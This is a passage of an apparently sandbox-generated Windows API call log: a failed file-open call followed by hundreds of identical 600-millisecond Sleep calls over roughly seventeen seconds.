dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0187.731] Sleep (dwMilliseconds=0x258) [0187.732] Sleep (dwMilliseconds=0x258) [0187.748] Sleep (dwMilliseconds=0x258) [0187.810] Sleep (dwMilliseconds=0x258) [0187.874] Sleep (dwMilliseconds=0x258) [0187.907] Sleep (dwMilliseconds=0x258) [0187.920] Sleep (dwMilliseconds=0x258) [0187.983] Sleep (dwMilliseconds=0x258) [0188.009] Sleep (dwMilliseconds=0x258) [0188.076] Sleep (dwMilliseconds=0x258) [0188.114] Sleep (dwMilliseconds=0x258) [0188.154] Sleep (dwMilliseconds=0x258) [0188.193] Sleep (dwMilliseconds=0x258) [0188.200] Sleep (dwMilliseconds=0x258) [0188.263] Sleep (dwMilliseconds=0x258) [0188.286] Sleep (dwMilliseconds=0x258) [0188.342] Sleep (dwMilliseconds=0x258) [0188.367] Sleep (dwMilliseconds=0x258) [0188.372] Sleep (dwMilliseconds=0x258) [0188.434] Sleep (dwMilliseconds=0x258) [0188.462] Sleep (dwMilliseconds=0x258) [0188.512] Sleep (dwMilliseconds=0x258) [0188.546] Sleep (dwMilliseconds=0x258) [0188.593] Sleep (dwMilliseconds=0x258) [0188.637] Sleep (dwMilliseconds=0x258) [0188.701] Sleep (dwMilliseconds=0x258) [0188.747] Sleep (dwMilliseconds=0x258) [0188.793] Sleep (dwMilliseconds=0x258) [0188.829] Sleep (dwMilliseconds=0x258) [0188.843] Sleep (dwMilliseconds=0x258) [0188.855] Sleep (dwMilliseconds=0x258) [0188.871] Sleep (dwMilliseconds=0x258) [0188.887] Sleep (dwMilliseconds=0x258) [0188.950] Sleep (dwMilliseconds=0x258) [0188.996] Sleep (dwMilliseconds=0x258) [0189.093] Sleep (dwMilliseconds=0x258) [0189.105] Sleep (dwMilliseconds=0x258) [0189.121] Sleep (dwMilliseconds=0x258) [0189.184] Sleep (dwMilliseconds=0x258) [0189.247] Sleep (dwMilliseconds=0x258) [0189.281] Sleep (dwMilliseconds=0x258) [0189.301] Sleep (dwMilliseconds=0x258) [0189.355] Sleep (dwMilliseconds=0x258) [0189.377] Sleep (dwMilliseconds=0x258) [0189.434] Sleep (dwMilliseconds=0x258) [0189.461] Sleep (dwMilliseconds=0x258) [0189.473] Sleep (dwMilliseconds=0x258) [0189.526] Sleep (dwMilliseconds=0x258) [0189.543] Sleep (dwMilliseconds=0x258) [0189.604] Sleep (dwMilliseconds=0x258) [0189.620] Sleep (dwMilliseconds=0x258) [0189.683] Sleep (dwMilliseconds=0x258) [0189.698] Sleep (dwMilliseconds=0x258) [0189.714] Sleep (dwMilliseconds=0x258) [0189.776] Sleep (dwMilliseconds=0x258) [0189.839] Sleep (dwMilliseconds=0x258) [0189.862] Sleep (dwMilliseconds=0x258) [0189.870] Sleep (dwMilliseconds=0x258) [0189.885] Sleep (dwMilliseconds=0x258) [0189.948] Sleep (dwMilliseconds=0x258) [0190.011] Sleep (dwMilliseconds=0x258) [0190.026] Sleep (dwMilliseconds=0x258) [0190.068] Sleep (dwMilliseconds=0x258) [0190.104] Sleep (dwMilliseconds=0x258) [0190.166] Sleep (dwMilliseconds=0x258) [0190.186] Sleep (dwMilliseconds=0x258) [0190.197] Sleep (dwMilliseconds=0x258) [0190.214] Sleep (dwMilliseconds=0x258) [0190.275] Sleep (dwMilliseconds=0x258) [0190.338] Sleep (dwMilliseconds=0x258) [0190.360] Sleep (dwMilliseconds=0x258) [0190.369] Sleep (dwMilliseconds=0x258) [0190.384] Sleep (dwMilliseconds=0x258) [0190.447] Sleep (dwMilliseconds=0x258) [0190.516] Sleep (dwMilliseconds=0x258) [0190.533] Sleep (dwMilliseconds=0x258) [0190.540] Sleep (dwMilliseconds=0x258) [0190.558] Sleep (dwMilliseconds=0x258) [0190.619] Sleep (dwMilliseconds=0x258) [0190.681] Sleep (dwMilliseconds=0x258) [0190.698] Sleep (dwMilliseconds=0x258) [0190.712] Sleep (dwMilliseconds=0x258) [0190.728] Sleep (dwMilliseconds=0x258) [0190.790] Sleep (dwMilliseconds=0x258) [0190.837] Sleep (dwMilliseconds=0x258) [0190.859] Sleep (dwMilliseconds=0x258) [0190.869] Sleep (dwMilliseconds=0x258) [0190.884] Sleep (dwMilliseconds=0x258) [0190.902] Sleep (dwMilliseconds=0x258) [0190.915] Sleep (dwMilliseconds=0x258) [0190.930] Sleep (dwMilliseconds=0x258) [0190.993] Sleep (dwMilliseconds=0x258) [0191.072] Sleep (dwMilliseconds=0x258) [0191.112] Sleep (dwMilliseconds=0x258) [0191.118] Sleep (dwMilliseconds=0x258) [0191.134] Sleep (dwMilliseconds=0x258) [0191.149] Sleep (dwMilliseconds=0x258) [0191.164] Sleep (dwMilliseconds=0x258) [0191.181] Sleep (dwMilliseconds=0x258) [0191.243] Sleep (dwMilliseconds=0x258) [0191.289] Sleep (dwMilliseconds=0x258) [0191.311] Sleep (dwMilliseconds=0x258) [0191.321] Sleep (dwMilliseconds=0x258) [0191.346] Sleep (dwMilliseconds=0x258) [0191.352] Sleep (dwMilliseconds=0x258) [0191.367] Sleep (dwMilliseconds=0x258) [0191.383] Sleep (dwMilliseconds=0x258) [0191.401] Sleep (dwMilliseconds=0x258) [0191.461] Sleep (dwMilliseconds=0x258) [0191.507] Sleep (dwMilliseconds=0x258) [0191.532] Sleep (dwMilliseconds=0x258) [0191.539] Sleep (dwMilliseconds=0x258) [0191.555] Sleep (dwMilliseconds=0x258) [0191.570] Sleep (dwMilliseconds=0x258) [0191.586] Sleep (dwMilliseconds=0x258) [0191.602] Sleep (dwMilliseconds=0x258) [0191.617] Sleep (dwMilliseconds=0x258) [0191.679] Sleep (dwMilliseconds=0x258) [0191.726] Sleep (dwMilliseconds=0x258) [0191.747] Sleep (dwMilliseconds=0x258) [0191.757] Sleep (dwMilliseconds=0x258) [0191.775] Sleep (dwMilliseconds=0x258) [0191.789] Sleep (dwMilliseconds=0x258) [0191.804] Sleep (dwMilliseconds=0x258) [0191.820] Sleep (dwMilliseconds=0x258) [0191.883] Sleep (dwMilliseconds=0x258) [0191.929] Sleep (dwMilliseconds=0x258) [0191.962] Sleep (dwMilliseconds=0x258) [0191.976] Sleep (dwMilliseconds=0x258) [0191.992] Sleep (dwMilliseconds=0x258) [0192.009] Sleep (dwMilliseconds=0x258) [0192.022] Sleep (dwMilliseconds=0x258) [0192.076] Sleep (dwMilliseconds=0x258) [0192.118] Sleep (dwMilliseconds=0x258) [0192.177] Sleep (dwMilliseconds=0x258) [0192.184] Sleep (dwMilliseconds=0x258) [0192.194] Sleep (dwMilliseconds=0x258) [0192.210] Sleep (dwMilliseconds=0x258) [0192.227] Sleep (dwMilliseconds=0x258) [0192.242] Sleep (dwMilliseconds=0x258) [0192.256] Sleep (dwMilliseconds=0x258) [0192.319] Sleep (dwMilliseconds=0x258) [0192.372] Sleep (dwMilliseconds=0x258) [0192.385] Sleep (dwMilliseconds=0x258) [0192.397] Sleep (dwMilliseconds=0x258) [0192.417] Sleep (dwMilliseconds=0x258) [0192.428] Sleep (dwMilliseconds=0x258) [0192.444] Sleep (dwMilliseconds=0x258) [0192.460] Sleep (dwMilliseconds=0x258) [0192.476] Sleep (dwMilliseconds=0x258) [0192.537] Sleep (dwMilliseconds=0x258) [0192.584] Sleep (dwMilliseconds=0x258) [0192.608] Sleep (dwMilliseconds=0x258) [0192.615] Sleep (dwMilliseconds=0x258) [0192.631] Sleep (dwMilliseconds=0x258) [0192.646] Sleep (dwMilliseconds=0x258) [0192.662] Sleep (dwMilliseconds=0x258) [0192.680] Sleep (dwMilliseconds=0x258) [0192.694] Sleep (dwMilliseconds=0x258) [0192.756] Sleep (dwMilliseconds=0x258) [0192.804] Sleep (dwMilliseconds=0x258) [0192.857] Sleep (dwMilliseconds=0x258) [0192.865] Sleep (dwMilliseconds=0x258) [0192.881] Sleep (dwMilliseconds=0x258) [0192.896] Sleep (dwMilliseconds=0x258) [0192.913] Sleep (dwMilliseconds=0x258) [0192.974] Sleep (dwMilliseconds=0x258) [0193.022] Sleep (dwMilliseconds=0x258) [0193.045] Sleep (dwMilliseconds=0x258) [0193.070] Sleep (dwMilliseconds=0x258) [0193.083] Sleep (dwMilliseconds=0x258) [0193.099] Sleep (dwMilliseconds=0x258) [0193.114] Sleep (dwMilliseconds=0x258) [0193.177] Sleep (dwMilliseconds=0x258) [0193.223] Sleep (dwMilliseconds=0x258) [0193.262] Sleep (dwMilliseconds=0x258) [0193.270] Sleep (dwMilliseconds=0x258) [0193.286] Sleep (dwMilliseconds=0x258) [0193.306] Sleep (dwMilliseconds=0x258) [0193.317] Sleep (dwMilliseconds=0x258) [0193.333] Sleep (dwMilliseconds=0x258) [0193.402] Sleep (dwMilliseconds=0x258) [0193.442] Sleep (dwMilliseconds=0x258) [0193.481] Sleep (dwMilliseconds=0x258) [0193.498] Sleep (dwMilliseconds=0x258) [0193.506] Sleep (dwMilliseconds=0x258) [0193.520] Sleep (dwMilliseconds=0x258) [0193.536] Sleep (dwMilliseconds=0x258) [0193.598] Sleep (dwMilliseconds=0x258) [0193.645] Sleep (dwMilliseconds=0x258) [0193.673] Sleep (dwMilliseconds=0x258) [0193.677] Sleep (dwMilliseconds=0x258) [0193.692] Sleep (dwMilliseconds=0x258) [0193.707] Sleep (dwMilliseconds=0x258) [0193.723] Sleep (dwMilliseconds=0x258) [0193.738] Sleep (dwMilliseconds=0x258) [0193.757] Sleep (dwMilliseconds=0x258) [0193.817] Sleep (dwMilliseconds=0x258) [0193.863] Sleep (dwMilliseconds=0x258) [0193.923] Sleep (dwMilliseconds=0x258) [0193.925] Sleep (dwMilliseconds=0x258) [0193.941] Sleep (dwMilliseconds=0x258) [0193.957] Sleep (dwMilliseconds=0x258) [0193.973] Sleep (dwMilliseconds=0x258) [0193.990] Sleep (dwMilliseconds=0x258) [0194.070] Sleep (dwMilliseconds=0x258) [0194.114] Sleep (dwMilliseconds=0x258) [0194.148] Sleep (dwMilliseconds=0x258) [0194.161] Sleep (dwMilliseconds=0x258) [0194.176] Sleep (dwMilliseconds=0x258) [0194.191] Sleep (dwMilliseconds=0x258) [0194.206] Sleep (dwMilliseconds=0x258) [0194.224] Sleep (dwMilliseconds=0x258) [0194.285] Sleep (dwMilliseconds=0x258) [0194.331] Sleep (dwMilliseconds=0x258) [0194.359] Sleep (dwMilliseconds=0x258) [0194.362] Sleep (dwMilliseconds=0x258) [0194.378] Sleep (dwMilliseconds=0x258) [0194.396] Sleep (dwMilliseconds=0x258) [0194.414] Sleep (dwMilliseconds=0x258) [0194.425] Sleep (dwMilliseconds=0x258) [0194.445] Sleep (dwMilliseconds=0x258) [0194.503] Sleep (dwMilliseconds=0x258) [0194.550] Sleep (dwMilliseconds=0x258) [0194.567] Sleep (dwMilliseconds=0x258) [0194.581] Sleep (dwMilliseconds=0x258) [0194.596] Sleep (dwMilliseconds=0x258) [0194.614] Sleep (dwMilliseconds=0x258) [0194.631] Sleep (dwMilliseconds=0x258) [0194.644] Sleep (dwMilliseconds=0x258) [0194.705] Sleep (dwMilliseconds=0x258) [0194.753] Sleep (dwMilliseconds=0x258) [0194.777] Sleep (dwMilliseconds=0x258) [0194.784] Sleep (dwMilliseconds=0x258) [0194.799] Sleep (dwMilliseconds=0x258) [0194.815] Sleep (dwMilliseconds=0x258) [0194.831] Sleep (dwMilliseconds=0x258) [0194.847] Sleep (dwMilliseconds=0x258) [0194.863] Sleep (dwMilliseconds=0x258) [0194.924] Sleep (dwMilliseconds=0x258) [0194.972] Sleep (dwMilliseconds=0x258) [0195.004] Sleep (dwMilliseconds=0x258) [0195.018] Sleep (dwMilliseconds=0x258) [0195.039] Sleep (dwMilliseconds=0x258) [0195.074] Sleep (dwMilliseconds=0x258) [0195.080] Sleep (dwMilliseconds=0x258) [0195.143] Sleep (dwMilliseconds=0x258) [0195.191] Sleep (dwMilliseconds=0x258) [0195.217] Sleep (dwMilliseconds=0x258) [0195.220] Sleep (dwMilliseconds=0x258) [0195.236] Sleep (dwMilliseconds=0x258) [0195.252] Sleep (dwMilliseconds=0x258) [0195.269] Sleep (dwMilliseconds=0x258) [0195.283] Sleep (dwMilliseconds=0x258) [0195.299] Sleep (dwMilliseconds=0x258) [0195.361] Sleep (dwMilliseconds=0x258) [0195.408] Sleep (dwMilliseconds=0x258) [0195.436] Sleep (dwMilliseconds=0x258) [0195.439] Sleep (dwMilliseconds=0x258) [0195.454] Sleep (dwMilliseconds=0x258) [0195.470] Sleep (dwMilliseconds=0x258) [0195.485] Sleep (dwMilliseconds=0x258) [0195.501] Sleep (dwMilliseconds=0x258) [0195.564] Sleep (dwMilliseconds=0x258) [0195.611] Sleep (dwMilliseconds=0x258) [0195.632] Sleep (dwMilliseconds=0x258) [0195.644] Sleep (dwMilliseconds=0x258) [0195.657] Sleep (dwMilliseconds=0x258) [0195.673] Sleep (dwMilliseconds=0x258) [0195.690] Sleep (dwMilliseconds=0x258) [0195.704] Sleep (dwMilliseconds=0x258) [0195.720] Sleep (dwMilliseconds=0x258) [0195.782] Sleep (dwMilliseconds=0x258) [0195.829] Sleep (dwMilliseconds=0x258) [0195.849] Sleep (dwMilliseconds=0x258) [0195.860] Sleep (dwMilliseconds=0x258) [0195.876] Sleep (dwMilliseconds=0x258) [0195.891] Sleep (dwMilliseconds=0x258) [0195.907] Sleep (dwMilliseconds=0x258) [0195.923] Sleep (dwMilliseconds=0x258) [0195.985] Sleep (dwMilliseconds=0x258) [0196.032] Sleep (dwMilliseconds=0x258) [0196.074] Sleep (dwMilliseconds=0x258) [0196.078] Sleep (dwMilliseconds=0x258) [0196.094] Sleep (dwMilliseconds=0x258) [0196.110] Sleep (dwMilliseconds=0x258) [0196.125] Sleep (dwMilliseconds=0x258) [0196.141] Sleep (dwMilliseconds=0x258) [0196.203] Sleep (dwMilliseconds=0x258) [0196.250] Sleep (dwMilliseconds=0x258) [0196.270] Sleep (dwMilliseconds=0x258) [0196.281] Sleep (dwMilliseconds=0x258) [0196.298] Sleep (dwMilliseconds=0x258) [0196.313] Sleep (dwMilliseconds=0x258) [0196.328] Sleep (dwMilliseconds=0x258) [0196.344] Sleep (dwMilliseconds=0x258) [0196.359] Sleep (dwMilliseconds=0x258) [0196.422] Sleep (dwMilliseconds=0x258) [0196.468] Sleep (dwMilliseconds=0x258) [0196.492] Sleep (dwMilliseconds=0x258) [0196.501] Sleep (dwMilliseconds=0x258) [0196.515] Sleep (dwMilliseconds=0x258) [0196.533] Sleep (dwMilliseconds=0x258) [0196.546] Sleep (dwMilliseconds=0x258) [0196.562] Sleep (dwMilliseconds=0x258) [0196.624] Sleep (dwMilliseconds=0x258) [0196.672] Sleep (dwMilliseconds=0x258) [0196.706] Sleep (dwMilliseconds=0x258) [0196.718] Sleep (dwMilliseconds=0x258) [0196.733] Sleep (dwMilliseconds=0x258) [0196.751] Sleep (dwMilliseconds=0x258) [0196.765] Sleep (dwMilliseconds=0x258) [0196.827] Sleep (dwMilliseconds=0x258) [0196.874] Sleep (dwMilliseconds=0x258) [0196.897] Sleep (dwMilliseconds=0x258) [0196.905] Sleep (dwMilliseconds=0x258) [0196.921] Sleep (dwMilliseconds=0x258) [0196.937] Sleep (dwMilliseconds=0x258) [0196.952] Sleep (dwMilliseconds=0x258) [0196.968] Sleep (dwMilliseconds=0x258) [0196.983] Sleep (dwMilliseconds=0x258) [0197.056] Sleep (dwMilliseconds=0x258) [0197.092] Sleep (dwMilliseconds=0x258) [0197.134] Sleep (dwMilliseconds=0x258) [0197.139] Sleep (dwMilliseconds=0x258) [0197.155] Sleep (dwMilliseconds=0x258) [0197.170] Sleep (dwMilliseconds=0x258) [0197.186] Sleep (dwMilliseconds=0x258) [0197.202] Sleep (dwMilliseconds=0x258) [0197.264] Sleep (dwMilliseconds=0x258) [0197.311] Sleep (dwMilliseconds=0x258) [0197.332] Sleep (dwMilliseconds=0x258) [0197.342] Sleep (dwMilliseconds=0x258) [0197.358] Sleep (dwMilliseconds=0x258) [0197.376] Sleep (dwMilliseconds=0x258) [0197.389] Sleep (dwMilliseconds=0x258) [0197.404] Sleep (dwMilliseconds=0x258) [0197.467] Sleep (dwMilliseconds=0x258) [0197.528] Sleep (dwMilliseconds=0x258) [0197.545] Sleep (dwMilliseconds=0x258) [0197.560] Sleep (dwMilliseconds=0x258) [0197.578] Sleep (dwMilliseconds=0x258) [0197.592] Sleep (dwMilliseconds=0x258) [0197.607] Sleep (dwMilliseconds=0x258) [0197.670] Sleep (dwMilliseconds=0x258) [0197.716] Sleep (dwMilliseconds=0x258) [0197.735] Sleep (dwMilliseconds=0x258) [0197.749] Sleep (dwMilliseconds=0x258) [0197.763] Sleep (dwMilliseconds=0x258) [0197.780] Sleep (dwMilliseconds=0x258) [0197.794] Sleep (dwMilliseconds=0x258) [0197.810] Sleep (dwMilliseconds=0x258) [0197.872] Sleep (dwMilliseconds=0x258) [0197.920] Sleep (dwMilliseconds=0x258) [0197.943] Sleep (dwMilliseconds=0x258) [0197.955] Sleep (dwMilliseconds=0x258) [0197.966] Sleep (dwMilliseconds=0x258) [0197.982] Sleep (dwMilliseconds=0x258) [0197.997] Sleep (dwMilliseconds=0x258) [0198.013] Sleep (dwMilliseconds=0x258) [0198.030] Sleep (dwMilliseconds=0x258) [0198.106] Sleep (dwMilliseconds=0x258) [0198.154] Sleep (dwMilliseconds=0x258) [0198.197] Sleep (dwMilliseconds=0x258) [0198.200] Sleep (dwMilliseconds=0x258) [0198.216] Sleep (dwMilliseconds=0x258) [0198.231] Sleep (dwMilliseconds=0x258) [0198.247] Sleep (dwMilliseconds=0x258) [0198.263] Sleep (dwMilliseconds=0x258) [0198.329] Sleep (dwMilliseconds=0x258) [0198.373] Sleep (dwMilliseconds=0x258) [0198.398] Sleep (dwMilliseconds=0x258) [0198.403] Sleep (dwMilliseconds=0x258) [0198.418] Sleep (dwMilliseconds=0x258) [0198.434] Sleep (dwMilliseconds=0x258) [0198.450] Sleep (dwMilliseconds=0x258) [0198.465] Sleep (dwMilliseconds=0x258) [0198.483] Sleep (dwMilliseconds=0x258) [0198.543] Sleep (dwMilliseconds=0x258) [0198.591] Sleep (dwMilliseconds=0x258) [0198.610] Sleep (dwMilliseconds=0x258) [0198.621] Sleep (dwMilliseconds=0x258) [0198.637] Sleep (dwMilliseconds=0x258) [0198.652] Sleep (dwMilliseconds=0x258) [0198.668] Sleep (dwMilliseconds=0x258) [0198.684] Sleep (dwMilliseconds=0x258) [0198.746] Sleep (dwMilliseconds=0x258) [0198.793] Sleep (dwMilliseconds=0x258) [0198.808] Sleep (dwMilliseconds=0x258) [0198.824] Sleep (dwMilliseconds=0x258) [0198.844] Sleep (dwMilliseconds=0x258) [0198.855] Sleep (dwMilliseconds=0x258) [0198.871] Sleep (dwMilliseconds=0x258) [0198.887] Sleep (dwMilliseconds=0x258) [0198.949] Sleep (dwMilliseconds=0x258) [0198.995] Sleep (dwMilliseconds=0x258) [0199.020] Sleep (dwMilliseconds=0x258) [0199.027] Sleep (dwMilliseconds=0x258) [0199.063] Sleep (dwMilliseconds=0x258) [0199.074] Sleep (dwMilliseconds=0x258) [0199.089] Sleep (dwMilliseconds=0x258) [0199.105] Sleep (dwMilliseconds=0x258) [0199.168] Sleep (dwMilliseconds=0x258) [0199.214] Sleep (dwMilliseconds=0x258) [0199.229] Sleep (dwMilliseconds=0x258) [0199.245] Sleep (dwMilliseconds=0x258) [0199.261] Sleep (dwMilliseconds=0x258) [0199.278] Sleep (dwMilliseconds=0x258) [0199.292] Sleep (dwMilliseconds=0x258) [0199.308] Sleep (dwMilliseconds=0x258) [0199.370] Sleep (dwMilliseconds=0x258) [0199.418] Sleep (dwMilliseconds=0x258) [0199.434] Sleep (dwMilliseconds=0x258) [0199.448] Sleep (dwMilliseconds=0x258) [0199.464] Sleep (dwMilliseconds=0x258) [0199.479] Sleep (dwMilliseconds=0x258) [0199.495] Sleep (dwMilliseconds=0x258) [0199.512] Sleep (dwMilliseconds=0x258) [0199.620] Sleep (dwMilliseconds=0x258) [0199.650] Sleep (dwMilliseconds=0x258) [0199.651] Sleep (dwMilliseconds=0x258) [0199.666] Sleep (dwMilliseconds=0x258) [0199.682] Sleep (dwMilliseconds=0x258) [0199.698] Sleep (dwMilliseconds=0x258) [0199.713] Sleep (dwMilliseconds=0x258) [0199.729] Sleep (dwMilliseconds=0x258) [0199.791] Sleep (dwMilliseconds=0x258) [0199.839] Sleep (dwMilliseconds=0x258) [0199.861] Sleep (dwMilliseconds=0x258) [0199.869] Sleep (dwMilliseconds=0x258) [0199.885] Sleep (dwMilliseconds=0x258) [0199.901] Sleep (dwMilliseconds=0x258) [0199.916] Sleep (dwMilliseconds=0x258) [0199.932] Sleep (dwMilliseconds=0x258) [0199.947] Sleep (dwMilliseconds=0x258) [0200.009] Sleep (dwMilliseconds=0x258) [0200.066] Sleep (dwMilliseconds=0x258) [0200.110] Sleep (dwMilliseconds=0x258) [0200.122] Sleep (dwMilliseconds=0x258) [0200.134] Sleep (dwMilliseconds=0x258) [0200.150] Sleep (dwMilliseconds=0x258) [0200.166] Sleep (dwMilliseconds=0x258) [0200.228] Sleep (dwMilliseconds=0x258) [0200.276] Sleep (dwMilliseconds=0x258) [0200.304] Sleep (dwMilliseconds=0x258) [0200.306] Sleep (dwMilliseconds=0x258) [0200.322] Sleep (dwMilliseconds=0x258) [0200.337] Sleep (dwMilliseconds=0x258) [0200.353] Sleep (dwMilliseconds=0x258) [0200.368] Sleep (dwMilliseconds=0x258) [0200.417] Sleep (dwMilliseconds=0x258) [0200.464] Sleep (dwMilliseconds=0x258) [0200.509] Sleep (dwMilliseconds=0x258) [0200.524] Sleep (dwMilliseconds=0x258) [0200.540] Sleep (dwMilliseconds=0x258) [0200.567] Sleep (dwMilliseconds=0x258) [0200.575] Sleep (dwMilliseconds=0x258) [0200.633] Sleep (dwMilliseconds=0x258) [0200.680] Sleep (dwMilliseconds=0x258) [0200.696] Sleep (dwMilliseconds=0x258) [0200.712] Sleep (dwMilliseconds=0x258) [0200.737] Sleep (dwMilliseconds=0x258) [0200.743] Sleep (dwMilliseconds=0x258) [0200.759] Sleep (dwMilliseconds=0x258) [0200.774] Sleep (dwMilliseconds=0x258) [0200.837] Sleep (dwMilliseconds=0x258) [0200.883] Sleep (dwMilliseconds=0x258) [0200.917] Sleep (dwMilliseconds=0x258) [0200.930] Sleep (dwMilliseconds=0x258) [0200.954] Sleep (dwMilliseconds=0x258) [0200.961] Sleep (dwMilliseconds=0x258) [0200.977] Sleep (dwMilliseconds=0x258) [0200.993] Sleep (dwMilliseconds=0x258) [0201.070] Sleep (dwMilliseconds=0x258) [0201.117] Sleep (dwMilliseconds=0x258) [0201.146] Sleep (dwMilliseconds=0x258) [0201.148] Sleep (dwMilliseconds=0x258) [0201.165] Sleep (dwMilliseconds=0x258) [0201.182] Sleep (dwMilliseconds=0x258) [0201.195] Sleep (dwMilliseconds=0x258) [0201.211] Sleep (dwMilliseconds=0x258) [0201.226] Sleep (dwMilliseconds=0x258) [0201.289] Sleep (dwMilliseconds=0x258) [0201.338] Sleep (dwMilliseconds=0x258) [0201.356] Sleep (dwMilliseconds=0x258) [0201.367] Sleep (dwMilliseconds=0x258) [0201.382] Sleep (dwMilliseconds=0x258) [0201.400] Sleep (dwMilliseconds=0x258) [0201.414] Sleep (dwMilliseconds=0x258) [0201.429] Sleep (dwMilliseconds=0x258) [0201.445] Sleep (dwMilliseconds=0x258) [0201.492] Sleep (dwMilliseconds=0x258) [0201.539] Sleep (dwMilliseconds=0x258) [0201.576] Sleep (dwMilliseconds=0x258) [0201.585] Sleep (dwMilliseconds=0x258) [0201.602] Sleep (dwMilliseconds=0x258) [0201.616] Sleep (dwMilliseconds=0x258) [0201.632] Sleep (dwMilliseconds=0x258) [0201.649] Sleep (dwMilliseconds=0x258) [0201.710] Sleep (dwMilliseconds=0x258) [0201.758] Sleep (dwMilliseconds=0x258) [0201.800] Sleep (dwMilliseconds=0x258) [0201.804] Sleep (dwMilliseconds=0x258) [0201.824] Sleep (dwMilliseconds=0x258) [0201.835] Sleep (dwMilliseconds=0x258) [0201.852] Sleep (dwMilliseconds=0x258) [0201.869] Sleep (dwMilliseconds=0x258) [0201.928] Sleep (dwMilliseconds=0x258) [0201.976] Sleep (dwMilliseconds=0x258) [0201.991] Sleep (dwMilliseconds=0x258) [0202.007] Sleep (dwMilliseconds=0x258) [0202.022] Sleep (dwMilliseconds=0x258) [0202.038] Sleep (dwMilliseconds=0x258) [0202.073] Sleep (dwMilliseconds=0x258) [0202.131] Sleep (dwMilliseconds=0x258) [0202.179] Sleep (dwMilliseconds=0x258) [0202.194] Sleep (dwMilliseconds=0x258) [0202.209] Sleep (dwMilliseconds=0x258) [0202.225] Sleep (dwMilliseconds=0x258) [0202.240] Sleep (dwMilliseconds=0x258) [0202.256] Sleep (dwMilliseconds=0x258) [0202.271] Sleep (dwMilliseconds=0x258) [0202.319] Sleep (dwMilliseconds=0x258) [0202.392] Sleep (dwMilliseconds=0x258) [0202.403] Sleep (dwMilliseconds=0x258) [0202.412] Sleep (dwMilliseconds=0x258) [0202.428] Sleep (dwMilliseconds=0x258) [0202.443] Sleep (dwMilliseconds=0x258) [0202.459] Sleep (dwMilliseconds=0x258) [0202.475] Sleep (dwMilliseconds=0x258) [0202.537] Sleep (dwMilliseconds=0x258) [0202.583] Sleep (dwMilliseconds=0x258) [0202.599] Sleep (dwMilliseconds=0x258) [0202.615] Sleep (dwMilliseconds=0x258) [0202.631] Sleep (dwMilliseconds=0x258) [0202.647] Sleep (dwMilliseconds=0x258) [0202.662] Sleep (dwMilliseconds=0x258) [0202.677] Sleep (dwMilliseconds=0x258) [0202.740] Sleep (dwMilliseconds=0x258) [0202.787] Sleep (dwMilliseconds=0x258) [0202.815] Sleep (dwMilliseconds=0x258) [0202.819] Sleep (dwMilliseconds=0x258) [0202.833] Sleep (dwMilliseconds=0x258) [0202.851] Sleep (dwMilliseconds=0x258) [0202.864] Sleep (dwMilliseconds=0x258) [0202.880] Sleep (dwMilliseconds=0x258) [0202.896] Sleep (dwMilliseconds=0x258) [0202.959] Sleep (dwMilliseconds=0x258) [0203.005] Sleep (dwMilliseconds=0x258) [0203.026] Sleep (dwMilliseconds=0x258) [0203.036] Sleep (dwMilliseconds=0x258) [0203.079] Sleep (dwMilliseconds=0x258) [0203.083] Sleep (dwMilliseconds=0x258) [0203.099] Sleep (dwMilliseconds=0x258) [0203.161] Sleep (dwMilliseconds=0x258) [0203.207] Sleep (dwMilliseconds=0x258) [0203.223] Sleep (dwMilliseconds=0x258) [0203.239] Sleep (dwMilliseconds=0x258) [0203.255] Sleep (dwMilliseconds=0x258) [0203.270] Sleep (dwMilliseconds=0x258) [0203.285] Sleep (dwMilliseconds=0x258) [0203.302] Sleep (dwMilliseconds=0x258) [0203.363] Sleep (dwMilliseconds=0x258) [0203.411] Sleep (dwMilliseconds=0x258) [0203.431] Sleep (dwMilliseconds=0x258) [0203.441] Sleep (dwMilliseconds=0x258) [0203.457] Sleep (dwMilliseconds=0x258) [0203.473] Sleep (dwMilliseconds=0x258) [0203.488] Sleep (dwMilliseconds=0x258) [0203.504] Sleep (dwMilliseconds=0x258) [0203.566] Sleep (dwMilliseconds=0x258) [0203.613] Sleep (dwMilliseconds=0x258) [0203.629] Sleep (dwMilliseconds=0x258) [0203.644] Sleep (dwMilliseconds=0x258) [0203.660] Sleep (dwMilliseconds=0x258) [0203.676] Sleep (dwMilliseconds=0x258) [0203.691] Sleep (dwMilliseconds=0x258) [0203.707] Sleep (dwMilliseconds=0x258) [0203.769] Sleep (dwMilliseconds=0x258) [0203.816] Sleep (dwMilliseconds=0x258) [0203.835] Sleep (dwMilliseconds=0x258) [0203.848] Sleep (dwMilliseconds=0x258) [0203.864] Sleep (dwMilliseconds=0x258) [0203.879] Sleep (dwMilliseconds=0x258) [0203.894] Sleep (dwMilliseconds=0x258) [0203.910] Sleep (dwMilliseconds=0x258) [0203.973] Sleep (dwMilliseconds=0x258) [0204.019] Sleep (dwMilliseconds=0x258) [0204.041] Sleep (dwMilliseconds=0x258) [0204.065] Sleep (dwMilliseconds=0x258) [0204.084] Sleep (dwMilliseconds=0x258) [0204.097] Sleep (dwMilliseconds=0x258) [0204.112] Sleep (dwMilliseconds=0x258) [0204.175] Sleep (dwMilliseconds=0x258) [0204.222] Sleep (dwMilliseconds=0x258) [0204.253] Sleep (dwMilliseconds=0x258) [0204.268] Sleep (dwMilliseconds=0x258) [0204.284] Sleep (dwMilliseconds=0x258) [0204.300] Sleep (dwMilliseconds=0x258) [0204.315] Sleep (dwMilliseconds=0x258) [0204.331] Sleep (dwMilliseconds=0x258) [0204.393] Sleep (dwMilliseconds=0x258) [0204.441] Sleep (dwMilliseconds=0x258) [0204.468] Sleep (dwMilliseconds=0x258) [0204.471] Sleep (dwMilliseconds=0x258) [0204.487] Sleep (dwMilliseconds=0x258) [0204.502] Sleep (dwMilliseconds=0x258) [0204.518] Sleep (dwMilliseconds=0x258) [0204.534] Sleep (dwMilliseconds=0x258) [0204.596] Sleep (dwMilliseconds=0x258) [0204.643] Sleep (dwMilliseconds=0x258) [0204.672] Sleep (dwMilliseconds=0x258) [0204.688] Sleep (dwMilliseconds=0x258) [0204.692] Sleep (dwMilliseconds=0x258) [0204.705] Sleep (dwMilliseconds=0x258) [0204.721] Sleep (dwMilliseconds=0x258) [0204.736] Sleep (dwMilliseconds=0x258) [0204.800] Sleep (dwMilliseconds=0x258) [0204.861] Sleep (dwMilliseconds=0x258) [0204.866] Sleep (dwMilliseconds=0x258) [0204.877] Sleep (dwMilliseconds=0x258) [0204.892] Sleep (dwMilliseconds=0x258) [0204.909] Sleep (dwMilliseconds=0x258) 